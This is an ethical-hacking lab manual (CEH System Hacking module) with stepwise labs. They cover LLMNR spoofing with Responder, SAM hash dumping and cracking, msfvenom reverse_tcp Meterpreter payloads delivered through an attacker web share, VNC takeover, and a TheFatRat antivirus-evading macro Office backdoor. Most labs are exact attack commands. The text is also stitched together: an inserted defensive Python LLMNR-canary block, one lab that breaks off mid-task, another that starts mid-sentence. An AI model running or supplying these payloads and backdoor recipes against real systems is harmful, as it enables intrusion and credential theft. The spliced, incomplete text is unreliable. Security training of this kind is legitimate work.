CEH Lab Manual - System Hacking - Module 06

System Hacking
System hacking is the science of testing computers and networks for vulnerabilities and plug-ins.

Lab Scenario
Password cracking is one of the crucial stages of system hacking. Although strong passwords that are difficult to crack (or guess) are easy to create and maintain, this is rarely done in practice. Therefore, passwords are one of the weakest links in the information-security chain.
Passwords rely on secrecy. After a password is compromised, its original owner is no longer the only person who can access the system with it. Hackers have many ways to obtain passwords. They can obtain passwords from local computers by using password-cracking software. To obtain passwords from across a network, they can use remote cracking utilities or network analyzers. The labs in this module demonstrate just how easily hackers can gather password information from your network, and describe password vulnerabilities that exist in computer networks, as well as countermeasures to help prevent these vulnerabilities from being exploited on your systems.

Lab Objectives
The objective of this lab is to help students learn to monitor a system remotely and to extract hidden files, and other tasks that include:
- Extracting administrative passwords
- Hiding files and extracting hidden files
- Recovering passwords
- Monitoring a system remotely

Lab Environment
To carry out this lab, you need:
- A computer running Windows Server 2016
- A computer running Windows Server 2012
- A computer running Windows 10 in a virtual machine
- A computer running Kali Linux in a virtual machine
- A web browser with an internet connection
- Administrative privileges to run tools

Lab Duration
Time: 190 Minutes

Ethical Hacking and Countermeasures Copyright © by EC-Council. All Rights Reserved. Reproduction is Strictly Prohibited.

Overview of System Hacking
The goal of system hacking is to gain access, escalate privileges, execute applications, and hide files.
Lab Tasks
Recommended labs to assist you in system hacking:
- Active Online Attack using Responder
- Dumping and Cracking SAM Hashes to Extract Plaintext Passwords
- Creating and using the Rainbow Tables
- Auditing System Passwords using L0phtCrack
- Exploiting Client Side Vulnerabilities and Establishing a VNC Session
- Escalating Privileges by Exploiting Client Side Vulnerabilities
- Hacking Windows Server 2012 with a Malicious Office Document using TheFatRat
- Hacking Windows 10 using Metasploit and Post Exploitation using Meterpreter
- User System Monitoring and Surveillance using Spytech SpyAgent
- Web Activity Monitoring and Recording using Power Spy
- Hiding Files using NTFS Streams
- Hiding Data using White Space Steganography
- Image Steganography using OpenStego
- Image Steganography using Quick Stego
- Covert Channels using Covert_TCP
- Viewing, Enabling and Clearing Audit Policies using Auditpol

Lab Analysis
Analyze and document the results related to this lab exercise. Give your opinion on your target's security posture and exposure.
PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS

Active Online Attack using Responder
LLMNR/NBT-NS Spoofing Attack is a classic internal network attack that still works today, due to low awareness and the fact that it is enabled by default in Windows.

Lab Scenario
LLMNR and NBT-NS are enabled by default in Windows and can be used to extract the password hashes from a user. Since the awareness of this attack is low, there is a good chance of acquiring the user credentials on an internal network penetration test. By sniffing for LLMNR/NBT-NS broadcasts it is possible for an attacker to spoof itself as the server and send a response claiming to be the legitimate server. After the victim system accepts the connection, it is possible to gain the victim user's credentials by using a tool like Responder.
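A defender-side check for the spoofing the scenario describes, added here as an example and not part of the lab manual: query LLMNR for a hostname that cannot exist on the network, and treat any answer as evidence that a host is impersonating names. The RFC 4795 message layout (DNS-style header, question and A record over UDP 5355 to 224.0.0.252) is real; the canary name, transaction id and the reply bytes are constructed for the offline test, and sending/receiving the UDP datagram is left to the caller.

```python
"""LLMNR poisoning canary check (added example; not from the lab manual)."""
import secrets
import struct

LLMNR_GROUP = ("224.0.0.252", 5355)  # multicast destination from RFC 4795
FLAG_RESPONSE = 0x8000               # QR bit in the DNS-style header
TYPE_A, CLASS_IN = 1, 1


def encode_name(name: str) -> bytes:
    """Wire-format name: length-prefixed labels, zero terminated."""
    return b"".join(bytes([len(lbl)]) + lbl.encode("ascii")
                    for lbl in name.split(".")) + b"\x00"


def build_query(name: str, txid: int) -> bytes:
    """LLMNR query for an A record: 12-byte header plus one question."""
    header = struct.pack(">HHHHHH", txid, 0, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack(">HH", TYPE_A, CLASS_IN)


def _read_name(data: bytes, pos: int):
    """Decode a name at pos, following DNS compression pointers."""
    labels = []
    while True:
        length = data[pos]
        if length == 0:
            return ".".join(labels), pos + 1
        if length & 0xC0 == 0xC0:
            offset = struct.unpack(">H", data[pos:pos + 2])[0] & 0x3FFF
            tail, _ = _read_name(data, offset)
            labels.append(tail)
            return ".".join(labels), pos + 2
        pos += 1
        labels.append(data[pos:pos + length].decode("ascii", "replace"))
        pos += length


def parse_response(data: bytes):
    """Return (txid, [(name, ipv4), ...]) for every A answer in a response."""
    txid, flags, qd, an, _ns, _ar = struct.unpack(">HHHHHH", data[:12])
    if not flags & FLAG_RESPONSE:
        raise ValueError("not an LLMNR response")
    pos = 12
    for _ in range(qd):                      # skip the echoed question(s)
        _, pos = _read_name(data, pos)
        pos += 4
    answers = []
    for _ in range(an):
        name, pos = _read_name(data, pos)
        rtype, _rclass, _ttl, rdlen = struct.unpack(">HHIH", data[pos:pos + 10])
        pos += 10
        rdata, pos = data[pos:pos + rdlen], pos + rdlen
        if rtype == TYPE_A and rdlen == 4:
            answers.append((name.lower(), ".".join(str(b) for b in rdata)))
    return txid, answers


def poisoning_suspected(canary: str, txid: int, reply: bytes) -> bool:
    """A reply that resolves a name nobody owns means a host is spoofing it."""
    rtxid, answers = parse_response(reply)
    return rtxid == txid and any(n == canary.lower() for n, _ in answers)


def random_canary() -> str:
    """A hostname that should never legitimately resolve on the LAN."""
    return "canary-" + secrets.token_hex(4)


# Constructed sample reply to build_query("canary-deadbeef", 0x1234): a poisoner
# claims the non-existent name lives at 192.0.2.10 (documentation address range).
SAMPLE_POISONED_REPLY = (
    b"\x12\x34\x80\x00\x00\x01\x00\x01\x00\x00\x00\x00"   # id, QR=1, 1 question, 1 answer
    b"\x0fcanary-deadbeef\x00\x00\x01\x00\x01"            # echoed question, type A, class IN
    b"\xc0\x0c\x00\x01\x00\x01\x00\x00\x00\x1e\x00\x04"   # name pointer to offset 12, A, IN, TTL 30, len 4
    b"\xc0\x00\x02\x0a"                                    # 192.0.2.10
)
```

The matching mitigation is to turn off multicast name resolution (LLMNR) and NetBIOS over TCP/IP through Group Policy, so the unauthenticated fallback never happens.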
Lab Objectives
The objective of this lab is to help students understand how to:
- Perform an LLMNR/NBT-NS Spoofing attack on a network

Lab Environment
To perform the lab, you need:
- Windows 10 running as a virtual machine
- Kali Linux running as a virtual machine

Lab Duration
Time: 10 Minutes

Overview of LLMNR/NBT-NS
When a DNS name server request fails, Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are used by Windows systems as a fallback. If the DNS name still remains unresolved, the Windows system performs an unauthenticated UDP broadcast to the whole network. Any masquerading machine, claiming to be the server, then sends a response and captures the victim's credentials during the authentication process.

Lab Tasks
1. Before starting this lab, log in to the Windows 10 machine.
2. Log in as Username: Jason, Password: qwerty.
3. Now launch the Kali Linux virtual machine, and log in with Username: root, Password: toor.
4. Open a command terminal from the taskbar, type responder -I eth0 and press Enter, as shown in the screenshot.
5. Responder starts listening on the network interface for events, as shown in the screenshot.
6. Assume that you want to access a shared network drive connected in your network using the Windows 10 machine.
7. Switch back to Windows 10, right-click on the Start icon, and click Run, as shown in the screenshot.
8. The Run window appears; type \\CEH-Tools in the Open field and click OK. Leave the Windows 10 machine running and switch back to Kali Linux.
9. Responder starts capturing the access logs of the Windows 10 machine, as shown in the screenshot.
10. Responder will collect the hashes of the logged-in user of the target machine.
11. By default, Responder will store the logs in /usr/share/responder/logs.
12. Navigate to Places and click Computer from the menu bar, as shown in the screenshot.
13. The Computer window appears; navigate to usr > share > responder > logs and double-click the recorded log file to open and view the recorded data.
14. Hashes of the logged-in user collected by Responder.
15. We will crack the hashes to learn the password of the logged-in user, i.e., Jason.
16. To crack the passwords, open a new command line terminal and type john /usr/share/responder/logs/<file name of the logs.txt>, as shown in the screenshot.
Note: The log filename will differ in your lab environment. Here the log file name is SMBv2-NTLMv2-SSP-10.10.10.10.txt.
17. Cracked password hashes of the Jason user, as shown in the screenshot.

Lab Analysis
Analyze and document the results related to this lab exercise.
PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS

Dumping and Cracking SAM Hashes to Extract Plaintext Passwords
pwdump7 can be used to dump protected files. Ophcrack is a free open source (GPL licensed) program that cracks Windows passwords by using LM hashes through rainbow tables.

Lab Scenario
The Security Account Manager (SAM) is a database file present on Windows machines that stores user accounts and security descriptors for users on a local computer. It stores users' passwords in a hashed format (in LM hash and NTLM hash). Because a hash function is one-way, this provides some measure of security for the storage of the passwords. In a system hacking lifecycle, attackers generally dump operating system password hashes immediately after a compromise of the target machine.
The password hashes enable attackers to launch a variety of attacks on the system, including password cracking, pass the hash, unauthorized access of other systems using the same passwords, password analysis, and pattern recognition, in order to crack other passwords in the target environment.
You need to have administrator access to dump the contents of the SAM file.
Assessment of password strength is a critical milestone during your security assessment engagement. You will start your password assessment with a simple SAM hash dump and run it through a hash cracker to uncover plaintext passwords.

Lab Objectives
The objective of this lab is to help students learn how to:
- Use the pwdump7 tool to extract password hashes
- Use the Ophcrack tool to crack the passwords and obtain plain text passwords

Lab Environment
To carry out the lab you need:
- pwdump7, located at Z:\CEH-Tools\CEHv10 Module 06 System Hacking\Password Cracking Tools\pwdump7
- Ophcrack tool, located at Z:\CEH-Tools\CEHv10 Module 06 System Hacking\Password Cracking Tools\ophcrack
- Run this tool on Windows 10
- You can download the latest version of pwdump7 at http://www.tarasco.org/security/pwdump_7/index.html
- You can download the latest version of Ophcrack at http://ophcrack.sourceforge.net/
- Administrative privileges to run tools

Lab Duration
Time: 10 Minutes

Overview of the Lab
pwdump7 can also be used to dump protected files. You can always copy a used file by executing pwdump7.exe -d c:\lockedfile.dat backup-lockedfile.dat.
Rainbow tables for LM hashes of alphanumeric passwords are provided for free by the developers. By default, Ophcrack is bundled with tables that allow it to crack passwords no longer than 14 characters using only alphanumeric characters.

Lab Tasks
1. Before starting this lab, we need to find the User IDs associated with the usernames for the Windows 10 machine.
2. Launch the Windows 10 machine and log in.
3.
Launch Command Prompt in Administrator mode: type cmd in the Search field, right-click on Command Prompt, and click Run as administrator, as shown in the screenshot.
4. The User Account Control pop-up appears; click Yes.
5. In the Command Prompt window, type wmic useraccount get name,sid and press Enter.
6. By issuing this command we get the usernames and their respective UserIDs. Make a note of each UserID for further steps.
7. Now, copy the pwdump7 folder from the Z:\CEH-Tools\CEHv10 Module 06 System Hacking\Password Cracking Tools location and paste it on the Desktop.
8. Now, open a new command prompt window in Administrator mode, type cd C:\Users\Admin\Desktop\pwdump7 and press Enter.
9. Type PwDump7.exe and press Enter to gather the password hashes and UserIDs.
10. Now, at the command prompt, type PwDump7.exe > c:\hashes.txt and press Enter.
11. By issuing this command PwDump7.exe will write all of its output to the c:\hashes.txt file.
12. To check the generated hashes, navigate to c:\ and open the hashes.txt file with Notepad.
13. Now place the usernames before the respective UserIDs that we gathered in step 6, as shown in the screenshot.
14. Now press Ctrl+S to save the file; the Save As window appears. Choose the save location and click the Save button.
15. Now, we shall attempt to crack these password hashes with the Ophcrack tool.
16. Launch the Ophcrack application from Z:\CEH-Tools\CEHv10 Module 06 System Hacking\Password Cracking Tools\ophcrack\x86.
17. The Ophcrack main window appears, as shown in the screenshot.
18. Click the Load menu, and select PWDUMP file.
19. The Open PWDUMP file window appears. Browse to the PWDUMP file hashes.txt located on the Desktop.
20. Select the hashes.txt file, located on the Desktop, and click Open.
21. Hashes are loaded in Ophcrack, as shown in the screenshot.
22. Click Tables on the menu bar.
23. The Table Selection window appears; select Vista free and click Install.
24. The Select the directory which contains the tables window appears. Select the tables_vista_free folder, which is already downloaded and kept in Z:\CEH-Tools\CEHv10 Module 06 System Hacking\Password Cracking Tools\ophcrack, and click Select Folder.
Note: You can download free XP and Vista Rainbow Tables from http://ophcrack.sourceforge.net/tables.php.
25. This tables_vista_free is a pre-computed table for reversing cryptographic hash functions and recovering plaintext passwords up to a certain length.
26. The selected table vista_free is installed under the name Vista free, which is represented by a green colored bullet. Select the table, and click OK.
27. Click Crack on the menu bar.
Ophcrack begins to crack the passwords. Ophcrack will take a few minutes to crack the passwords; wait until it finishes the password cracking process.
28. In the meanwhile, it will also display the cracked passwords of the respective users.
29. Cracked passwords are displayed, as shown in the following screenshot.
30. In real time, if an attacker attempts to exploit a machine and escalate the privileges, he/she can obtain password hashes using tools such as pwdump7. By doing so, they can use hash decoding tools like Ophcrack to acquire plain-text passwords.

Lab Analysis
Analyze all the password hashes gathered during this lab, and figure out what the passwords are.
PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS

Creating and using the Rainbow Tables
Winrtgen is a graphical Rainbow Tables Generator that supports LM, FastLM, NTLM, LMCHALL, HalfLMCHALL, NTLMCHALL, MSCACHE, MD2, MD4, MD5, SHA1, RIPEMD160, MySQL323, MySQLSHA1, CiscoPIX, ORACLE, SHA-2 (256), SHA-2 (384), and SHA-2 (512) hashes.
RainbowCrack is a computer program that generates rainbow tables for use in password cracking.

Lab Scenario
Once an attacker gains access to a system's SAM database dump, the easiest and fastest route he or she can follow to recover the plain text password is to use rainbow tables. A rainbow table is a precomputed table of all possible combinations of a given character set and their respective hash values, used for reversing cryptographic hash functions. Password crackers compare the rainbow table's precompiled list of potential hashes to the hashed passwords in the database. The rainbow table associates plaintext possibilities with each of those hashes, which the attacker can then exploit to access the network as an authenticated user.
Rainbow tables make password cracking much faster than earlier methods, such as brute force cracking and dictionary attacks. However, the approach uses a lot of RAM due to the large amount of data in such a table. With the availability of large computing power, you can generate huge rainbow tables that you can use for your security and password audit assignments.

Lab Objectives
The objective of this lab is to show students how to create rainbow tables and use them to crack the hashes and obtain plain text passwords.

Lab Environment
To carry out the lab you need:
- A computer running Windows Server 2016
- A computer running Windows 10
- Winrtgen tool located at Z:\CEH-Tools\CEHv10 Module 06 System Hacking\Tools to Create Rainbow Tables\Winrtgen
- RainbowCrack tool located at Z:\CEH-Tools\CEHv10 Module 06 System Hacking\Tools to Create Rainbow Tables\RainbowCrack
- Download the latest version of Winrtgen at http://www.oxid.it/projects.html
- Download the latest version of RainbowCrack at http://project-rainbowcrack.com/
- If you wish to download the latest version, then the screenshots shown in the lab might differ
- Administrative privileges to run the tools

Lab Duration
Time: 10 Minutes

Overview of Rainbow Tables
A rainbow table is a pre-computed table for reversing cryptographic hash functions, usually used for cracking password hashes. Tables are usually used in recovering the plaintext password consisting of a limited set of characters up to a certain length.

Lab Tasks
1. Assume that you have the password hashes of the user accounts of the Windows 10 machine in the hashes.txt file that you obtained in the previous lab (Dumping and Cracking SAM Hashes to Extract Plaintext Passwords), located on the Desktop of the Windows 10 machine. Share the file by any medium so that it can be accessed on the Windows Server 2016 machine.
2. Launch the Windows Server 2016 machine and log in.
3.
Navigate to Z:\CEH-Tools\CEHv10 Module 06 System Hacking\Tools to Create Rainbow Tables\Winrtgen, and double-click winrtgen.exe.
4. If an Open File - Security Warning pop-up appears, click Run.
5. The main window of Winrtgen opens, as shown in the following screenshot.
6. Click the Add Table button to add a new rainbow table.
7. The Rainbow Table properties window appears.
8. a. Select ntlm from the Hash dropdown list.
   b. Set Min Len as 4, Max Len as 6 and Chain Count 4000000.
   c. Select loweralpha from the Charset dropdown list (this depends upon the password).
9. With these settings, you are creating a rainbow table that can be used to crack ntlm hashes of lowercase alphabetical passwords varying between 4-6 characters in length.
10. A file will be created and displayed in the Winrtgen window. Click OK.
11. Winrtgen begins to create the hash table.
Note: Winrtgen takes a lot of time to generate hashes. So, to save time for the lab demonstration, a pregenerated hash table is kept at the location Z:\CEH-Tools\CEHv10 Module 06 System Hacking\Tools to Create Rainbow Tables\Winrtgen.
12. The created hash table is saved automatically in Z:\CEH-Tools\CEHv10 Module 06 System Hacking\Tools to Create Rainbow Tables\Winrtgen.
13.
This generated table is used in tools such as RainbowCrack in order to crack passwords of various lengths, depending on the hashes you generate using Winrtgen.
14. Now, we shall try to use these tables and crack the password hashes using the RainbowCrack tool.
15. Navigate to Z:\CEH-Tools\CEHv10 Module 06 System Hacking\Tools to Create Rainbow Tables\RainbowCrack, and double-click rcrack_gui.exe.
16. If an Open File - Security Warning pop-up appears, click Run.
17. The main window of RainbowCrack opens, as shown in the following screenshot.
18. To add a password hash in RainbowCrack, click the File menu, and click Load NTLM Hashes from PWDUMP File.
19. The Open dialog box appears. Navigate to the hashes.txt of the Windows 10 machine that we gathered in the previous lab and click Open.
20. RainbowCrack will display the Hash value and the Username, as shown in the screenshot.
21. Import the rainbow table into RainbowCrack to crack the password: navigate to Rainbow Table and click Search Rainbow Tables from the menu bar.
22. The Open dialog box appears; navigate to the pre-generated rainbow table, which is located at Z:\CEH-Tools\CEHv10 Module 06 System Hacking\Tools to Create Rainbow Tables\Winrtgen, select ntlm_loweralpha#4-6_0_2400x4000000_oxid#000.rt and click Open.
23. As soon as you import the rainbow tables, RainbowCrack will crack the passwords of the Windows 10 machine users, as shown in the screenshot.

Lab Analysis
Analyze and document the results related to this lab exercise.
PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS

Auditing System Passwords using L0phtCrack
L0phtCrack is a password auditing tool that contains features such as scheduling, hash extraction from 64-bit Windows versions, multiprocessor algorithms, and network monitoring and decoding. It can import and crack UNIX password files from remote Windows machines.

Lab Scenario
Because security and compliance are high priorities for most organizations, attacks on an organization's computer systems take many different forms, such as spoofing, smurfing, and other types of Denial of Service (DoS) attacks. These attacks are designed to harm or interrupt the use of your operational systems.
Password cracking is a term used to describe the penetration of a network, system, or resource with or without the use of tools to unlock a resource that has been secured with a password. In this lab, we will look at what password cracking is, why attackers do it, how they achieve their goals, and what you can do to protect yourself. Through an examination of several scenarios, in this lab we describe some of the techniques they deploy and the tools that aid them in their assaults, and how password crackers work both internally and externally to violate a company's infrastructure.
To be an expert ethical hacker and penetration tester, you must understand how to crack an administrator password. In this lab, we crack system user accounts using L0phtCrack.
Lab Objectives
The objective of this lab is to help students learn how to:
- Use the L0phtCrack tool to attain user passwords that can be easily cracked

Lab Environment
To carry out the lab you need:
- L0phtCrack tool located at Z:\CEH-Tools\CEHv10 Module 06 System Hacking\Password Cracking Tools\L0phtCrack
- Windows Server 2016 running as a machine
- Windows Server 2012 running as a machine
- Or download the latest version of L0phtCrack at http://www.l0phtcrack.com
- Administrative privileges to run tools

Lab Duration
Time: 15 Minutes

Overview of the Lab
In this lab, acting as a security auditor, you will be running the L0phtCrack tool by giving it the remote machine's administrator user credentials. User account passwords that are cracked in a short amount of time are considered to be weak, and you need to take certain measures to make them stronger. In this lab, we are auditing passwords on a Windows Server 2012 system.

Lab Tasks
1. Launch the Windows Server 2012 virtual machine.
2. Launch and log in to Windows Server 2016 and navigate to Z:\CEH-Tools\CEHv10 Module 06 System Hacking\Password Cracking Tools\L0phtCrack. Double-click lc7setup_v7.0.5_Win64.exe.
3. If an Open File - Security Warning appears, click Run.
4. Follow the wizard-driven installation steps to install L0phtCrack.
Note: At the time of installation, a Program Compatibility Assistant pop-up may appear. Click Close, and continue with the installation.
5. On completing the installation, launch the L0phtCrack application from the Apps list.
7. Click Password Auditing Wizard, as shown in the screenshot.
8. In the Introduction wizard, click Next.
9. In the Choose Target System Type wizard, choose the Operating System type and click Next.
In this lab we are choosing Windows.
10. Choose the A remote machine radio button in the Windows Import wizard and click Next.
11. In the Windows Import From Remote Machine (SMB) wizard, type in the required details, as shown in the screenshot.
12. In the Host field type the IP address of the target machine, here Windows Server 2012 (10.10.10.12).
13. Select the Use Specific User Credentials radio button, and in the Credentials section type the login credentials of the Windows Server 2012 machine: Username: Administrator, Password: Pa$$w0rd.
14. If the machine is under a domain, enter the domain name in the Domain section; here Windows Server 2012 belongs to the CEH.com domain.
15. Once you have entered all the required fields, click Next to proceed.
16. In the Choose Audit Type wizard, select the Strong Password Audit radio button and click Next.
17. In the Reporting Options wizard, check the Generate Report at End of Auditing option, then choose the Report type (here, CSV) and click the Browse button to store the report in the desired location.
18. In this lab we are choosing the Desktop as the location. Type the file name, and click Save in the Choose report file name window, as shown in the screenshot.
19. Click Next in the Reporting Options wizard after providing the location.
20. Choose the Run this job immediately radio button and click Next in the Job Scheduling wizard.
21. In the Summary wizard, click Finish.
22. The Perform Calibration pop-up appears; click No to continue.
Note: The Perform Calibration pop-up will appear multiple times during the password cracking process; click No every time it appears.
23. The Copying LC7 Agent pop-up appears; click Yes to continue.
24. L0phtCrack starts cracking the passwords of the target machine. In the lower right corner of the window you can see the status, as shown in the screenshot.
25. L0phtCrack will show you the cracked passwords of the users that are available on the target machine.
26. So, you have successfully attained weak as well as strong passwords. You can click the Stop button present at the lower left corner of the window once you attain all the passwords.

Lab Analysis
Document the results and reports gathered during the lab.
PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS

Exploiting Client Side Vulnerabilities and Establishing a VNC Session
Attackers use client-side vulnerabilities to exploit unpatched software, thereby gaining access to the machine on which the software is installed.

Lab Scenario
VNC enables attackers to remotely access and control computers targeted from another computer or mobile device wherever they are in the world. At the same time, it is also used by administrators and organizations of every industry sector for a range of different scenarios and use cases, including providing IT desktop support to colleagues and friends and accessing systems on the move. Attackers can exploit client-side vulnerabilities in target systems to establish unauthorized VNC sessions and remotely control their targets.

Lab Objectives
The objective of this lab is to help students learn how to exploit client-side vulnerabilities and establish a VNC session.
Lab Environment
To carry this out, you need:
- Kali Linux running in a virtual machine (Attacker Machine)
- Windows 10 running in a virtual machine (Victim machine)
- A web browser
- Administrative privileges to run tools

Lab Duration
Time: 10 Minutes

Overview of the Lab
This lab demonstrates the exploitation procedure enforced on a weakly patched Windows 10 machine that allows you to gain remote access to it through a remote desktop connection.

Lab Tasks
1. Launch the Kali Linux machine and log in. Open a Terminal and type msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -f exe LHOST=(attacker machine IP address) LPORT=444 -o /root/Desktop/Test.exe and press Enter.
Note: Here the attacker machine IP address is 10.10.10.14 (Kali Linux Machine).
2. This will generate Test.exe, a malicious file, on the Desktop, as shown in the screenshot.
3. Now create a directory to share this file, set the permissions, and copy the file from the Desktop to the shared location:
   a. Type mkdir /var/www/html/share and press Enter to create a share folder.
   b. Type chmod -R 755 /var/www/html/share and press Enter.
   c. Type chown -R www-data:www-data /var/www/html/share and press Enter.
   d. Now copy the malicious file to the shared location by typing cp /root/Desktop/Test.exe /var/www/html/share and press Enter.
4. Now start the apache service; to do this type service apache2 start and press Enter.
5. Type msfconsole and press Enter to launch the Metasploit framework.
6. In the msf console type use multi/handler and press Enter.
7. Now we need to set the payload, LHOST and LPORT; to do this:
   a. Type set payload windows/meterpreter/reverse_tcp and press Enter.
   b. Type set LHOST 10.10.10.14 and press Enter.
   c. Type set LPORT 444 and press Enter.
8. Type exploit and press Enter to start the listener. Leave the Kali Linux machine running and switch to the Windows 10 machine.
9. Log in to the Windows 10 machine and open a browser. In this lab we are using the Chrome browser.
10. In the address bar of the browser type http://10.10.10.14/share and press Enter.
11. As soon as you press Enter, it will display the share folder contents, as shown in the screenshot.
12. Click the Test.exe file to download it.
Note: 10.10.10.14 is the IP address of the attacker machine, i.e., Kali Linux.
13. The malicious file will be downloaded to the default downloads location of the browser. Here in this lab Downloads is the location. Now, double-click the Test.exe file to run it.
14. The Open File - Security Warning window appears. Click Run. Leave the Windows 10 machine running, and switch to the Kali Linux machine.
15. Now switch to the attacker machine, i.e., the Kali Linux machine. Observe that one session is created or opened in the Meterpreter shell, as shown in the screenshot.
16. To open a session in the Meterpreter shell type sessions -i 1 and press Enter.
Note: If the Meterpreter shell is connected to the session automatically then skip this step.
17. The Meterpreter shell appears, as shown in the screenshot. Type sysinfo and press Enter to verify that the Windows 10 machine is hacked.
18. Now, create a VNC session to access the Windows 10 machine remotely.
19. Type run vnc and press Enter.
20. This will open a VNC session of the victim's machine, as shown in the screenshot.

Lab Analysis
Analyze and document the results related to this lab exercise. Provide your opinion regarding your target's security posture and exposure.
PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS

Escalating Privileges by Exploiting Client Side Vulnerabilities
Privilege escalation is the demonstration of misusing a bug, configuration imperfection, or design oversight in operating systems or software applications to gain elevated access to assets that are normally shielded from an application or user.

Lab Scenario
Once attackers gain access to the target system, they start looking for different ways to escalate their privileges in the system. They can exploit a vulnerability, design flaw, or configuration oversight in the operating system or software applications on the target system to gain elevated access to resources that are normally protected from an application or user. The privilege escalation can be vertical or lateral.

Lab Objectives
The objective of this lab is to help students learn how to escalate privileges on a victim machine by exploiting its vulnerabilities.

Lab Environment
To perform this lab, you need:
- Windows 8 running as a virtual machine
- Windows 10 running as a virtual machine
- Kali Linux running as a virtual machine

Lab Duration
Time: 20 Minutes

Overview of the Lab
This lab demonstrates the exploitation procedure enforced on a weakly patched Windows 8 machine that allows you to gain access to it through a meterpreter shell, and then employ privilege escalation techniques to attain administrative privileges on the machine through the meterpreter shell.

Lab Tasks
Note: Before performing this lab, log in to the Kali Linux virtual machine. Click Places > Computer.
Navigate to File System > etc > apache2, open apache2.conf, enter the directive ServerName localhost on a new line, and save the file.
1. Launch the Windows 10 virtual machine and log in to its administrator account.
2. Switch to the Kali Linux virtual machine and log in to it.
3. Launch a command line terminal.
4. Type the command msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -e x86/shikata_ga_nai -b "\x00" LHOST=10.10.10.11 -f exe > Desktop/Exploit.exe and press Enter.
5. The above command creates a Windows executable file named "Exploit.exe" and saves it on the Kali Linux desktop.
6. Now you need to share Exploit.exe with the victim machine. (In this lab, we are using Windows 10 as the victim machine.)
7. Open a new command line terminal, type the command mkdir /var/www/html/share and press Enter to create a new directory named share.
8. Change the mode of the share folder to 755 by typing the command chmod -R 755 /var/www/html/share/ and pressing Enter.
9. Change the ownership of that folder to www-data by typing the command chown -R www-data:www-data /var/www/html/share/ and pressing Enter.
10. Type the command ls -la /var/www/html | grep share and press Enter.
11. The next step is to start the Apache server. Type the command service apache2 start in the terminal and press Enter.
12. Now that the Apache web server is running, copy the Exploit.exe file into the share folder.
13. Type the command cp /root/Desktop/Exploit.exe /var/www/html/share/ in the terminal, and press Enter.
14. Type msfconsole in the terminal and press Enter.
15. Type use exploit/multi/handler and press Enter to handle exploits launched outside the framework.
16. Now run the following commands in msfconsole:
a) Type set payload windows/meterpreter/reverse_tcp and press Enter.
b) Type set LHOST 10.10.10.11 and press Enter.
17. To start the handler, type the command exploit and press Enter.
18. Now, switch to the Windows 10 virtual machine.
19. Launch Chrome. Type the URL http://10.10.10.11/share/ in the address bar, and press Enter.
Note: Here 10.10.10.11 is the IP address of Kali Linux, which may vary in your lab environment.
20. You are redirected to the Apache index webpage. Click the Exploit.exe link to download the backdoor file.
21. Once the file is downloaded, navigate to the browser's download location and double-click the Exploit.exe file to execute it. In this lab, the default location is the Downloads folder.
Note: If you don't have apache2 installed, run apt-get install apache2.
22. If an Open File - Security Warning window appears, click Run.
23. Leave the Windows machine running, so that the Exploit.exe file runs in the background, and now switch to the Kali Linux machine.

Hacking Windows Server 2012 with a Malicious Office Document using TheFatRat

Lab Scenario
... many big organizations fall victim to this attack vector. The attackers trick the staff of a workplace into clicking links in a legitimate-looking document which turns out to be malicious and is even able to evade antivirus programs. In this lab we shall find out how to create a malicious office document and get a Meterpreter shell by bypassing anti-virus systems.

Lab Objectives
The objective of this lab is to help students learn:
• How to use an office document to exploit a Windows machine

Lab Environment
To carry out this lab, you need:
• A computer running Windows Server 2016
• Kali Linux running as a virtual machine
• Windows Server 2012 running as a virtual machine

Lab Duration
Time: 15 Minutes

Overview of TheFatRat
TheFatRat provides an easy way to create backdoors and payloads which can bypass most antivirus systems.

Lab Tasks
1. Log in to the Kali Linux machine and open a Terminal window. Type git clone https://github.com/Screetsec/TheFatRat and hit Enter.
Note: TheFatRat is already preinstalled in the Kali Linux machine; you can skip to step 8.
2. After the cloning is completed, type cd TheFatRat and hit Enter.
3. Type chmod -R 755 /root/TheFatRat and hit Enter as shown in the screenshot.
4. Type ./setup.sh and hit Enter to begin the installation as shown in the screenshot.
5. An UPDATING KALI REPO popup appears as shown in the screenshot. Let it finish updating the Kali packages.
6. After the update window closes, TheFatRat asks to create a shortcut in the system. Type y and hit Enter.
7. A warning appears as shown in the screenshot. Hit Enter to continue.
8. After the installation is complete, in the Terminal window type fatrat and hit Enter.
9. TheFatRat launches and starts to verify the installed dependencies as shown in the screenshot.
10. A Service Running message comes on the screen as shown in the screenshot. Press Enter to continue.
11. You will get multiple prompts saying press Enter to continue; do so.
12. The TheFatRat menu appears as shown in the screenshot.
Choose [6] Create Fud Backdoor 1000% with PwnWinds [Excelent] by typing 6 in the menu and hit Enter.
13. The PwnWinds menu appears as shown in the screenshot. Choose [3] Create exe file with apache + Powershell (FUD 100%) by typing 3 in the menu and hit Enter.
14. Type 10.10.10.11 in the Set LHOST IP option and hit Enter.
15. In the Set LPORT option, type 4444 and hit Enter.
16. Type payload in the 'Please enter the base name for output files' option and hit Enter as shown in the screenshot.
17. In the Choose Payload option, choose 3 windows/meterpreter/reverse_tcp by typing 3 and hit Enter.
18. TheFatRat generates the payload.exe file located at Home/TheFatRat/output as shown in the screenshot.
19. Now, to go back to the main menu, choose [8] Back to menu by typing 8 and hit Enter.
20. From the menu, choose [07] Create Backdoor For Office with Microsploit by typing 7 and hit Enter as shown in the screenshot.
21. The Microsploit menu appears; choose option [2] The Microsoft Office Macro on Windows by typing 2 and hit Enter.
22. Type 10.10.10.11 in the Set LHOST IP option and hit Enter.
23. In the Set LPORT option, type 4444 and hit Enter.
24. Type BadDoc in the Enter the base name for output files option and hit Enter as shown in the screenshot.
25. In Enter the message for the document body (ENTER = default), type you have been hacked! and hit Enter.
26. In the Are u want Use custom exe file backdoor (y/n) option, type y and hit Enter.
27. Type /root/TheFatRat/output/payload.exe as the path and hit Enter.
28. In the Choose Payload option, choose 3 windows/meterpreter/reverse_tcp by typing 3 and hit Enter.
29. The malicious document details appear as shown in the screenshot. Hit Enter.
